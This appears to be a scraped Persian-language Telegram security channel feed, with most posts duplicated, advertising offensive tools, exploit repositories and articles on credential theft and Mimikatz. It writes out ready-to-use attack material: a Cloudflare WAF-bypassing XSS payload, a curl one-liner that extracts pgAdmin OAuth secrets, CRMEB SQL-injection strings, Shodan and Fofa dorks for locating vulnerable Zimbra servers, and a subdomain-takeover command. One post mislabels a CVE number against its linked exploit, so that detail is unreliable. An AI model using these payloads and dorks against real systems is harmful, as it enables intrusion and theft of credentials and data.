⚙معرفی ابزار Psobf.
ابزار Psobf برای Obfuscate کردن کدهای پاورشل استفاده میشود. این ابزار با زبان Go نوشته شده و قابلیت Obfuscate کردن در 5 سطح مختلف را فراهم میکند. این ابزار حدود ۳ ماه قبل منتشر شده است.
لینک دانلود ابزار:
🔗https://github.com/TaurusOmar/psobf
@sn0whacks
#معرفی_ابزار
ابزار Psobf برای Obfuscate کردن کدهای پاورشل استفاده میشود. این ابزار با زبان Go نوشته شده و قابلیت Obfuscate کردن در 5 سطح مختلف را فراهم میکند. این ابزار حدود ۳ ماه قبل منتشر شده است.
لینک دانلود ابزار:
🔗https://github.com/TaurusOmar/psobf
@sn0whacks
#معرفی_ابزار
❤🔥4👍1
⚠️اکسپلویت آسیبپذیری بالابردن سطح دسترسی در HyperV.
⭕️آسیبپذیری با شماره CVE-2024-38080 از نوع Buffer Overflow بوده و به مهاجم Local با سطح دسترسی User امکان بالابردن سطح دسترسی به SYSTEM را میدهد.
⭕️درجه اهمیت: CVSS 7.8 High
☣اکسپلویت:
🔗https://github.com/pwndorei/CVE-2024-38080
@sn0whacks
#CVE_2024_38080 #hyperV #privEsc
⭕️آسیبپذیری با شماره CVE-2024-38080 از نوع Buffer Overflow بوده و به مهاجم Local با سطح دسترسی User امکان بالابردن سطح دسترسی به SYSTEM را میدهد.
⭕️درجه اهمیت: CVSS 7.8 High
☣اکسپلویت:
🔗https://github.com/pwndorei/CVE-2024-38080
@sn0whacks
#CVE_2024_38080 #hyperV #privEsc
👍2
⚙معرفی ابزار ModTracer.
ابزار ModTracer تمامی RootKitهای مخفی موجود در کرنل لینوکس را پیدا میکند.
لینک دانلود ابزار:
🔗https://github.com/MatheuZSecurity/ModTracer?tab=readme-ov-file
@sn0whacks
#معرفی_ابزار
ابزار ModTracer تمامی RootKitهای مخفی موجود در کرنل لینوکس را پیدا میکند.
لینک دانلود ابزار:
🔗https://github.com/MatheuZSecurity/ModTracer?tab=readme-ov-file
@sn0whacks
#معرفی_ابزار
❤🔥2👍1
📝به دست آوردن Credential با بررسی لاگهای ویندوز.
مقاله زیر درباره نحوه به دست آوردن User/pass کاربران دامین با بررسی لاگهای ویندوز با ابزارها و روشهای مختلف را نشان میدهد.
لینک مقاله:
🔗https://practicalsecurityanalytics.com/extracting-credentials-from-windows-logs/
@sn0whacks
#مقاله
مقاله زیر درباره نحوه به دست آوردن User/pass کاربران دامین با بررسی لاگهای ویندوز با ابزارها و روشهای مختلف را نشان میدهد.
لینک مقاله:
🔗https://practicalsecurityanalytics.com/extracting-credentials-from-windows-logs/
@sn0whacks
#مقاله
👍5
📝نحوه انجام Enumeration بر روی سرویس SMB.
⭕️فرایند SMB Enumeration یکی از اقدامات کلیدی در تست نفوذ شبکه و Red Team میباشد. در مقاله زیر ابزارها و نحوه انجام این فرایند به طور کلی بیان شده است.
لینک مقاله:
🔗https://0xdf.gitlab.io/2024/03/21/smb-cheat-sheet.html
@sn0whacks
#smb #cheatsheet #مقاله
⭕️فرایند SMB Enumeration یکی از اقدامات کلیدی در تست نفوذ شبکه و Red Team میباشد. در مقاله زیر ابزارها و نحوه انجام این فرایند به طور کلی بیان شده است.
لینک مقاله:
🔗https://0xdf.gitlab.io/2024/03/21/smb-cheat-sheet.html
@sn0whacks
#smb #cheatsheet #مقاله
👍2
⚠️دور زدن TCC Protection و دسترسی به اطلاعات حساس کاربر در Mac.
⭕️در آسیبپذیری با شماره CVE-2024-40801 با قابلیت container-migration.plist یک برنامه در Sandbox امکان Migrate فایلهای ایمن شده TCC (مانند تاریخچه Safari، دیتابیس ایمیل، فایلهای داکیومنت کاربر) به داخل Container خود نرم افزار را دارد. عملا با این کار فایلهای ذکر شده برای مهاجم قابل دسترسی میباشد و مکانیزم TCC Protection دور میخورد.
☣لینک اکسپلویت:
🔗https://github.com/pvieito/ContainerMigrationExploit?tab=readme-ov-file
@sn0whacks
#CVE_2024_40801 #bypass #mac
⭕️در آسیبپذیری با شماره CVE-2024-40801 با قابلیت container-migration.plist یک برنامه در Sandbox امکان Migrate فایلهای ایمن شده TCC (مانند تاریخچه Safari، دیتابیس ایمیل، فایلهای داکیومنت کاربر) به داخل Container خود نرم افزار را دارد. عملا با این کار فایلهای ذکر شده برای مهاجم قابل دسترسی میباشد و مکانیزم TCC Protection دور میخورد.
☣لینک اکسپلویت:
🔗https://github.com/pvieito/ContainerMigrationExploit?tab=readme-ov-file
@sn0whacks
#CVE_2024_40801 #bypass #mac
👍4
📝چگونه در سال 2024 از ابزار Mimikatz استفاده کنیم؟
⭕️مقاله زیر به بررسی ابزار Mimikatz و نحوه اجرای سناریوهای مختلف برای به دست آوردن رمز عبور کاربر و انجام Lateral Movement پرداخته است.
لینک مقاله:
🔗https://www.stationx.net/how-to-use-mimikatz/
@sn0whacks
#mimikatz #مقاله
⭕️مقاله زیر به بررسی ابزار Mimikatz و نحوه اجرای سناریوهای مختلف برای به دست آوردن رمز عبور کاربر و انجام Lateral Movement پرداخته است.
لینک مقاله:
🔗https://www.stationx.net/how-to-use-mimikatz/
@sn0whacks
#mimikatz #مقاله
👍3
⚠️بررسی آسیبپذیری 0day در مایکروسافت: به دست آوردن هش NTLMv2 به کمک فایل Office + اکسپلویت.
⭕️آسیبپذیری 0day در Microsoft Office با شماره CVE-2024-3800 مربوط به دریافت هش NTLMv2 از طریق ارسال فایل Office مخرب به سمت قربانی میباشد.
⭕️زمانی که فایل مخرب Office باز میشود یک درخواست با Office uri scheme به سمت مهاجم ارسال میشود. مهاجم امکان Redirect کردن این درخواست به سمت UNC Path حاوی آدرس آیپی Responder را دارد. مهاجم به کمک ابزار Responder امکان دریافت هش NTMLv2 کاربر را دارد.
☣اکسپلویت آسیبپذیری (دیروز منتشر شده است):
🔗https://github.com/passtheticket/CVE-2024-38200
@sn0whacks
#CVE_2024_3800 #exploit #poc #office #ntlmv2 #responder
⭕️آسیبپذیری 0day در Microsoft Office با شماره CVE-2024-3800 مربوط به دریافت هش NTLMv2 از طریق ارسال فایل Office مخرب به سمت قربانی میباشد.
⭕️زمانی که فایل مخرب Office باز میشود یک درخواست با Office uri scheme به سمت مهاجم ارسال میشود. مهاجم امکان Redirect کردن این درخواست به سمت UNC Path حاوی آدرس آیپی Responder را دارد. مهاجم به کمک ابزار Responder امکان دریافت هش NTMLv2 کاربر را دارد.
☣اکسپلویت آسیبپذیری (دیروز منتشر شده است):
🔗https://github.com/passtheticket/CVE-2024-38200
@sn0whacks
#CVE_2024_3800 #exploit #poc #office #ntlmv2 #responder
👍6
⚠️بررسی آسیبپذیری RCE در سرویس CUPS در لینوکس + اکسپلویت.
⭕️سرویس CUPS یک سیستم پرینت در سیستم عامل لینوکس میباشد. این سرویس به صورت پیشفرض بر روی پورت 631 UDP کار میکند.
⭕️مهاجم میتواند یک PostScript Printer Denoscription یا به طور خلاصه PPD حاوی کد مخرب بسازد. زمانی که PPD ساخته شده توسط CUPS فراخوانی شود کد مخرب اجرا میشود.
⭕️شماره CVEهای ثبت شده برای آسیبپذیری:
CVE-2024-47076 (libcupsfilters), CVE-2024-47175 (libppd), CVE-2024-47176 (cups-browsed) and CVE-2024-47177 (cups-filters)
☣اکسپلویت آسیبپذیری (۱۱ ساعت قبل منتشر شده):
🔗https://github.com/RickdeJager/cupshax
@sn0whacks
#cups #rce #exploit #poc
⭕️سرویس CUPS یک سیستم پرینت در سیستم عامل لینوکس میباشد. این سرویس به صورت پیشفرض بر روی پورت 631 UDP کار میکند.
⭕️مهاجم میتواند یک PostScript Printer Denoscription یا به طور خلاصه PPD حاوی کد مخرب بسازد. زمانی که PPD ساخته شده توسط CUPS فراخوانی شود کد مخرب اجرا میشود.
⭕️شماره CVEهای ثبت شده برای آسیبپذیری:
CVE-2024-47076 (libcupsfilters), CVE-2024-47175 (libppd), CVE-2024-47176 (cups-browsed) and CVE-2024-47177 (cups-filters)
☣اکسپلویت آسیبپذیری (۱۱ ساعت قبل منتشر شده):
🔗https://github.com/RickdeJager/cupshax
@sn0whacks
#cups #rce #exploit #poc
🔥3👍2❤🔥1
🔥پیلود XSS برای دور زدن CloudFlare WAF:
‘>alert(154)</noscript><noscript/154=’;;;;;;;
@sn0whacks
#bugbountyTips
@sn0whacks
#bugbountyTips
👍2
⚠️بررسی آسیبپذیری افشای اطلاعات حساس در pgAdmin + اکسپلویت.
⭕️آسیبپذیری با شماره CVE-2024-9014 به مهاجم امکان دریافت ClientID و مقدار Secret مربوط به oAuth کاربر را میدهد و منجر به افشای اطلاعات کاربر میشود.
☣اکسپلویت:
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
@sn0whacks
#CVE_2024_9014 #pgAdmin #exploit #poc
⭕️آسیبپذیری با شماره CVE-2024-9014 به مهاجم امکان دریافت ClientID و مقدار Secret مربوط به oAuth کاربر را میدهد و منجر به افشای اطلاعات کاربر میشود.
☣اکسپلویت:
@sn0whacks
#CVE_2024_9014 #pgAdmin #exploit #poc
👍3
⚠️اکسپلویت آسیبپذیری RCE در Zimbra.
⭕️آسیبپذیری با شماره CVE-2024-45519 در سرویس postJournal وجود دارد که منجر به اجرای دستورات سیستمی به صورت unauthorized میشود.
🌐نحوه Dork در Shodan:
http.favicon.hash:1624375939
🌐نحوه Dork در Fofa:
app="Zimbra-Network-Client"
☣اکسپلویت پایتون (۱۸ ساعت قبل منتشر شده):
🔗https://github.com/p33d/CVE-2024-45519
@sn0whacks
#CVE_2024_45519 #zimbra #rce
⭕️آسیبپذیری با شماره CVE-2024-45519 در سرویس postJournal وجود دارد که منجر به اجرای دستورات سیستمی به صورت unauthorized میشود.
🌐نحوه Dork در Shodan:
http.favicon.hash:1624375939
🌐نحوه Dork در Fofa:
app="Zimbra-Network-Client"
☣اکسپلویت پایتون (۱۸ ساعت قبل منتشر شده):
🔗https://github.com/p33d/CVE-2024-45519
@sn0whacks
#CVE_2024_45519 #zimbra #rce
👍8
⚠️اکسپلویت آسیبپذیری Harcoded Credential در SolarWinds.
⭕️آسیبپذیری با شماره CVE-2024-28987 به دلیل وجود Hardcoded Credential در Solar Winds Web Help Desk (WHD) به وجود میآید.
⭕️این اطلاعات حساس که در ماژول OrionTicketController وجود دارد به مهاجم امکان دسترسی و تغییر و آپدیت اطلاعات بخش help desk ticket را دارد. اطلاعات این بخش شامل درخواستهای تغییر رمز عبور کاربر میباشد.
🔺درجه اهمیت: CVSS 9.1 Critical
☣اکسپلویت پایتون:
🔗https://github.com/horizon3ai/CVE-2024-28987
@sn0whacks
#CVE_2024_28987 #solarWinds #exploit #poc
⭕️آسیبپذیری با شماره CVE-2024-28987 به دلیل وجود Hardcoded Credential در Solar Winds Web Help Desk (WHD) به وجود میآید.
⭕️این اطلاعات حساس که در ماژول OrionTicketController وجود دارد به مهاجم امکان دسترسی و تغییر و آپدیت اطلاعات بخش help desk ticket را دارد. اطلاعات این بخش شامل درخواستهای تغییر رمز عبور کاربر میباشد.
🔺درجه اهمیت: CVSS 9.1 Critical
☣اکسپلویت پایتون:
🔗https://github.com/horizon3ai/CVE-2024-28987
@sn0whacks
#CVE_2024_28987 #solarWinds #exploit #poc
👍4
nmap.pdf
174.2 KB
📝فایل PDF موجود یک cheat sheet برای استفاده از ابزار nmap را نشان میدهد.
@sn0whacks
#pentesTips #nmap #cheatsheet
@sn0whacks
#pentesTips #nmap #cheatsheet
👍4
💉اکسپلویت آسیبپذیری sql Injection در CRMEB.
⭕️آسیبپذیری با شماره CVE-2024-36837 در تابع getProductList در فایل product Controller.php وجود دارد و به مهاجم امکان به دست آوردن اطلاعات حساس را میدهد.
⭕️درجه اهمیت: CVSS 7.5 High
⭕️نسخه آسیبپذیر: v.5.2.2
☣اکسپلویت:
/api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550)
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
@sn0whacks
#CVE_2024_36837 #sqli
⭕️آسیبپذیری با شماره CVE-2024-36837 در تابع getProductList در فایل product Controller.php وجود دارد و به مهاجم امکان به دست آوردن اطلاعات حساس را میدهد.
⭕️درجه اهمیت: CVSS 7.5 High
⭕️نسخه آسیبپذیر: v.5.2.2
☣اکسپلویت:
@sn0whacks
#CVE_2024_36837 #sqli
👍6
📝نکات باگبانتی.
با کمک ابزار subfinder و nuclie میتوانید آسیبپذیری Subdomain Takeover را در تارگت خود پیدا کنید:
subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target
@sn0whacks
#bugbountyTips
با کمک ابزار subfinder و nuclie میتوانید آسیبپذیری Subdomain Takeover را در تارگت خود پیدا کنید:
@sn0whacks
#bugbountyTips
👍5
⚠️بررسی آسیبپذیری بالابردن سطح دسترسی در کرنل لینوکس + اکسپلویت.
⭕️آسیبپذیری با شماره CVE-2024-26808 در Netfilter Framework وجود دارد و زمانی رخ میدهد که Netfilter در مدیریت بستههای شبکه دچار خطا شده و منجر به دسترسی مهاجم به memory میشود. در اکسپلویت آسیبپذیری فرایند cross cache Overwrite در memory انجام شده و منجر به دستکاری کرنل سیستمعامل میشود.
⭕️نسخه کرنل آسیبپذیر: v5.9 to v6.6
☣اکسپلویت:
🔗https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
@sn0whacks
#CVE_2024_26808 #exploit #poc
⭕️آسیبپذیری با شماره CVE-2024-26808 در Netfilter Framework وجود دارد و زمانی رخ میدهد که Netfilter در مدیریت بستههای شبکه دچار خطا شده و منجر به دسترسی مهاجم به memory میشود. در اکسپلویت آسیبپذیری فرایند cross cache Overwrite در memory انجام شده و منجر به دستکاری کرنل سیستمعامل میشود.
⭕️نسخه کرنل آسیبپذیر: v5.9 to v6.6
☣اکسپلویت:
🔗https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
@sn0whacks
#CVE_2024_26808 #exploit #poc
GitHub
security-research/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36 at master · google/security-research
This project hosts security advisories and their accompanying proof-of-concepts related to research conducted at Google which impact non-Google owned code. - google/security-research
👍4🔥1
reversing-for-everyone.pdf
23.9 MB
#معرفی_کتاب
📚کتاب Reverse Engineering for everyone به طور مبتدی مباحث مربوط به مهندسی معکوس را شرح میدهد و همچنین معماریهای مختلف را مورد بررسی قرار میدهد.
تعداد صفحات: 430.
@sn0whacks
📚کتاب Reverse Engineering for everyone به طور مبتدی مباحث مربوط به مهندسی معکوس را شرح میدهد و همچنین معماریهای مختلف را مورد بررسی قرار میدهد.
تعداد صفحات: 430.
@sn0whacks
👍5🔥1